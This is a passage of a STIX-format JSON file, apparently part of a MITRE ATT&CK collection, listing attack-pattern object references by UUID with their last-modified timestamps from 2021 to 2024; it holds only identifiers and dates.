"object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "object_modified": "2024-02-16T13:09:39.215Z"}, {"object_ref": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "object_modified": "2023-10-16T09:08:22.319Z"}, {"object_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "object_modified": "2023-10-13T17:57:08.425Z"}, {"object_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", "object_modified": "2024-03-28T16:14:28.678Z"}, {"object_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", "object_modified": "2022-10-18T22:48:33.286Z"}, {"object_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "object_modified": "2024-01-16T22:24:38.234Z"}, {"object_ref": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "object_modified": "2024-04-15T23:39:31.474Z"}, {"object_ref": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", "object_modified": "2021-10-17T16:17:55.499Z"}, {"object_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "object_modified": "2023-09-08T11:56:26.862Z"}, {"object_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "object_modified": "2024-03-01T16:56:32.245Z"}, {"object_ref": "attack-pattern--a6525aec-acc4-47fe-92f9-b9b4de4b9228", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "object_modified": "2023-10-18T16:31:56.936Z"}, {"object_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "object_modified": "2024-04-19T13:24:36.872Z"}, {"object_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", "object_modified": "2023-10-13T17:57:08.613Z"}, {"object_ref": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "object_modified": "2024-01-29T18:53:26.593Z"}, {"object_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "object_modified": "2024-04-16T12:24:40.163Z"}, {"object_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "object_modified": "2024-05-13T23:56:48.161Z"}, {"object_ref": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "object_modified": "2024-04-12T21:13:46.640Z"}, {"object_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "object_modified": "2024-02-02T17:18:39.004Z"}, {"object_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "object_modified": "2024-02-02T19:04:35.389Z"}, {"object_ref": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "object_modified": "2023-08-11T21:06:07.690Z"}, {"object_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", "object_modified": "2023-04-12T20:19:21.620Z"}, {"object_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "object_modified": "2023-11-21T20:02:33.404Z"}, {"object_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "object_modified": "2023-10-13T17:57:08.992Z"}, {"object_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", "object_modified": "2024-04-16T12:35:38.832Z"}, {"object_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "object_modified": "2023-10-13T17:57:09.193Z"}, {"object_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "object_modified": "2023-08-11T21:37:00.009Z"}, {"object_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "object_modified": "2024-03-07T14:28:02.910Z"}, {"object_ref": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "object_modified": "2024-04-16T12:27:18.945Z"}, {"object_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "object_modified": "2024-04-16T00:20:21.488Z"}, {"object_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "object_modified": "2023-05-31T12:34:03.420Z"}, {"object_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "object_modified": "2023-10-13T17:57:09.388Z"}, {"object_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", "object_modified": "2023-10-13T17:57:09.581Z"}, {"object_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "object_modified": "2024-03-01T15:49:15.588Z"}, {"object_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "object_modified": "2023-08-14T19:30:45.123Z"}, {"object_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", "object_modified": "2023-10-13T17:57:09.780Z"}, {"object_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "object_modified": "2024-03-01T17:17:37.292Z"}, {"object_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "object_modified": "2024-04-16T12:29:47.903Z"}, {"object_ref": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "object_modified": "2023-10-13T17:57:09.988Z"}, {"object_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "object_modified": "2023-05-04T18:00:33.023Z"}, {"object_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "object_modified": "2023-10-13T17:57:10.181Z"}, {"object_ref": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "object_modified": "2023-10-15T11:49:40.990Z"}, {"object_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", "object_modified": "2023-04-14T23:29:10.396Z"}, {"object_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "object_modified": "2023-09-14T21:12:48.411Z"}, {"object_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", "object_modified": "2023-10-13T17:57:10.374Z"}, {"object_ref": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "object_modified": "2023-04-12T22:46:33.995Z"}, {"object_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "object_modified": "2023-12-26T20:59:21.941Z"}, {"object_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "object_modified": "2023-09-15T19:11:47.547Z"}, {"object_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "object_modified": "2023-10-01T13:48:28.738Z"}, {"object_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c1a452f3-6499-4c12-b7e9-a6a0a102af76", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "object_modified": "2023-09-29T21:07:31.570Z"}, {"object_ref": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "object_modified": "2023-10-13T17:57:10.581Z"}, {"object_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "object_modified": "2023-03-30T21:01:48.815Z"}, {"object_ref": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", "object_modified": "2023-09-19T21:26:24.725Z"}, {"object_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "object_modified": "2023-08-14T14:55:07.432Z"}, {"object_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02", "object_modified": "2021-01-27T14:49:39.188Z"}, {"object_ref": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", "object_modified": "2023-10-13T17:57:10.768Z"}, {"object_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "object_modified": "2024-01-04T20:01:27.662Z"}, {"object_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "object_modified": "2023-08-14T19:23:58.317Z"}, {"object_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", "object_modified": "2023-10-13T17:57:10.962Z"}, {"object_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "object_modified": "2023-09-30T19:45:05.886Z"}, {"object_ref": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", "object_modified": "2023-10-02T22:17:54.968Z"}, {"object_ref": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "object_modified": "2023-03-30T21:01:52.356Z"}, {"object_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", "object_modified": "2024-04-12T21:13:56.431Z"}, {"object_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "object_modified": "2024-04-16T00:15:53.303Z"}, {"object_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "object_modified": "2024-04-13T14:28:20.651Z"}, {"object_ref": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "object_modified": "2024-01-30T18:35:58.021Z"}, {"object_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "object_modified": "2023-04-21T12:20:20.711Z"}, {"object_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "object_modified": "2023-09-08T20:28:49.600Z"}, {"object_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "object_modified": "2024-02-14T21:00:00.467Z"}, {"object_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "object_modified": "2023-10-13T17:57:11.152Z"}, {"object_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", "object_modified": "2024-02-28T21:08:56.520Z"}, {"object_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "object_modified": "2023-07-28T18:17:34.185Z"}, {"object_ref": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", "object_modified": "2024-04-18T20:53:46.175Z"}, {"object_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", "object_modified": "2023-09-30T20:24:19.357Z"}, {"object_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "object_modified": "2024-05-13T23:51:22.625Z"}, {"object_ref": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", "object_modified": "2022-10-18T22:44:01.723Z"}, {"object_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "object_modified": "2024-03-01T17:35:02.889Z"}, {"object_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d21bb61f-08ad-4dc1-b001-81ca6cb79954", "object_modified": "2023-04-14T20:04:42.893Z"}, {"object_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "object_modified": "2024-03-01T16:27:47.391Z"}, {"object_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "object_modified": "2023-10-03T17:30:32.192Z"}, {"object_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "object_modified": "2024-04-11T15:53:00.577Z"}, {"object_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "object_modified": "2023-07-14T14:01:41.475Z"}, {"object_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "object_modified": "2023-10-13T17:57:11.536Z"}, {"object_ref": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "object_modified": "2023-10-13T17:57:11.730Z"}, {"object_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7", "object_modified": "2024-04-12T03:27:48.171Z"}, {"object_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "object_modified": "2024-04-28T15:52:44.332Z"}, {"object_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "object_modified": "2024-04-16T12:22:29.150Z"}, {"object_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "object_modified": "2023-03-30T21:01:48.113Z"}, {"object_ref": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", "object_modified": "2022-10-20T21:19:57.555Z"}, {"object_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "object_modified": "2024-04-16T12:28:21.234Z"}, {"object_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", 